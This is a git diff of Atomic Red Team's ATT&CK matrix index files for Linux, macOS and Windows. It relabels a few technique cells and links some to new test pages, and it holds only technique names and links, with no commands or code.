 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) |  | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/macos-matrix.md

@@ -19,7 +19,7 @@
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) |  | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -27,7 +27,7 @@
 |  | [Kubernetes Exec Into Container](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
-|  | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 |  | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hide Artifacts](../../T1564/T1564.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Process Discovery](../../T1057/T1057.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Data from Network Shared Drive](../../T1039/T1039.md) |  | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -50,7 +50,7 @@
 |  | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Indirect Command Execution](../../T1202/T1202.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  |  |  |  |  |  |
+|  | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  |  |  |  |  |  |
 |  | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) |  |  |  |  |  |  |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Process Injection](../../T1055/T1055.md) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
@@ -115,7 +115,7 @@
 |  |  | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [IIS Components](../../T1505.004/T1505.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution](../../T1546/T1546.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -23,7 +23,7 @@
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
